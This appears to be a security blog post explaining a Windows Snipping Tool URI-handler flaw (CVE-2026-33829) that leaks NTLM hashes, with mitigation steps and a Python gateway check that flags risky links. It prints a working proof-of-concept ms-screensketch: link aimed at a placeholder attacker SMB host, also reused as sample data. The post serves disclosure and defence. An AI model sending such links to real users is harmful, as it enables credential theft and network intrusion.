What if taking a screenshot handed your password to a hacker?
On April 14, 2026, Microsoft patched a vulnerability that sounds like a prank but is devastatingly real. CVE-2026-33829 affects the Windows Snipping Tool — the same screenshot utility millions of users open daily without a second thought. And it can be weaponized to steal your password hash with a single click.
The Attack Chain: Stupidly Simple, Terrifyingly Effective
Here is how it works:
- An attacker crafts a malicious link using the ms-screensketch: URI scheme — the deep-link protocol Windows uses to open images directly in Snipping Tool.
- The link points the filePath parameter to a UNC path on an attacker-controlled SMB server: \\attacker.server\image.png
- The victim clicks the link (phishing email, social media DM, compromised website — anything works).
- Windows prompts: "Open Snipping Tool?" The user clicks yes.
- Snipping Tool attempts to load the "image" from the remote server. Windows silently authenticates using the current user's credentials.
- The attacker's SMB server captures the Net-NTLMv2 hash — enough to crack offline or relay into other systems.
The full PoC link looks like this:
ms-screensketch:edit?&filePath=\\attacker.server\file.png&isTemporary=false&saved=true&source=Toast
That is it. No exploit. No zero-day buffer overflow. No malware payload. Just a URI handler doing exactly what it was designed to do — and leaking your credentials in the process.
Why This Is Worse Than It Looks
Microsoft rated this moderate severity (CVSS 4.3). Security researchers disagree — loudly.
Here is why the real-world risk is critical:
- No admin rights needed. Any standard user clicking the link triggers the leak.
- Enterprise environments are juicy targets. NTLM hashes in Active Directory domains enable lateral movement, privilege escalation, and full domain compromise.
- Social engineering is trivial. "Check out this screenshot of your account" is way more convincing than "Download this executable."
- Snipping Tool is trusted. Users have been trained to treat it as harmless. Your EDR will not flag it. Your antivirus will not blink.
The Root Cause: Trust Without Verification
The vulnerability stems from how Snipping Tool's filePath parameter handles remote paths. The application initiates an SMB connection to load the image file — but it never validates whether that path is safe. It blindly trusts any UNC path you feed it, including attacker-controlled servers.
Once Windows initiates the SMB handshake, the Net-NTLMv2 hash is transmitted automatically. The attacker does not need to crack it immediately — they can relay it to other services, or take it offline for brute-force cracking. Weak passwords fall in minutes. Complex passwords might take days. But in enterprise environments, one hash often leads to dozens more.
What You Should Do Right Now
If you are on Windows:
- Install the April 2026 Patch Tuesday updates immediately. Microsoft patched this on April 14.
- Consider disabling NTLM where possible (though this breaks legacy systems in many environments).
- Train users to treat ms-screensketch: links with the same suspicion as any other unexpected link.
If you are a defender:
- Monitor for outbound SMB connections initiated by Snipping Tool processes.
- Block ms-screensketch: URI handling at the browser/email gateway level if not business-critical.
- Audit for NTLM usage across your network — this attack is just one of many ways these hashes get stolen.
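The gateway-level block above needs to decide which ms-screensketch: links are dangerous, and the PoC shape earlier in the post shows exactly what to look for: a filePath parameter that points off-host. The following is an added example of that check, not code from Microsoft or from the original post; the sample links are constructed (attacker.server is the placeholder host from the PoC, example.invalid is a reserved test domain), and the parser also decodes percent-encoded parameters so an encoded \\ is treated like a literal one.

```python
import re
from urllib.parse import unquote

# Constructed sample links (not real traffic) as an email or web gateway
# might see them. The first mirrors the published PoC shape.
SAMPLE_LINKS = [
    "ms-screensketch:edit?&filePath=\\\\attacker.server\\file.png"
    "&isTemporary=false&saved=true&source=Toast",
    # Same UNC path with the backslashes percent-encoded.
    "ms-screensketch:edit?filePath=%5C%5Cattacker.server%5Cshare%5Cpic.png",
    # Local path: Snipping Tool opens it without any SMB traffic.
    "ms-screensketch:edit?filePath=C:\\Users\\alice\\Pictures\\shot.png",
    # Not the scheme this rule cares about.
    "https://example.invalid/page",
]


def parse_screensketch(link):
    """Return the query parameters of an ms-screensketch: URI, or None."""
    if not link.lower().startswith("ms-screensketch:"):
        return None
    parts = link.split("?", 1)
    query = parts[1] if len(parts) == 2 else ""
    params = {}
    for item in query.split("&"):
        if not item:          # tolerate the leading '?&' seen in the PoC
            continue
        key, _, value = item.partition("=")
        # Decode percent-encoding so %5C%5C and \\ compare equal; keys are
        # lower-cased because the handler is not case-sensitive to our knowledge.
        params[unquote(key).lower()] = unquote(value)
    return params


def is_remote_path(path):
    """True for a UNC path (\\host\share or //host/share) that forces an SMB connection."""
    return re.match(r"^[\\/]{2}[^\\/]+", path.strip()) is not None


def is_credential_leak_risk(link):
    """Flag an ms-screensketch: link whose filePath would make Windows authenticate to a remote host."""
    params = parse_screensketch(link)
    if params is None:
        return False
    return is_remote_path(params.get("filepath", ""))


if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        print("BLOCK" if is_credential_leak_risk(link) else "allow", link)
```

A gateway rule built on this flags only links that would leave the host; local-path links keep working, so the block does not have to be all-or-nothing.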
The Bigger Picture
This vulnerability is a perfect example of what happens when trusted applications become attack vectors. The Snipping Tool is not malicious. It is not buggy in the traditional sense. It simply trusts too much. And in cybersecurity, trust is the enemy.
We have seen this pattern before — legitimate software abused for credential theft (think Outlook CVE-2023-23397 and its NTLM leak). But Snipping Tool is uniquely dangerous because it feels so innocent. Who suspects their screenshot utility?
The answer, after April 14, 2026: everyone should.
CVE-2026-33829 | CVSS 4.3 (Moderate — debatable) | Patched: April 14, 2026 | Affected: Windows Snipping Tool | Attack vector: URI handler + UNC path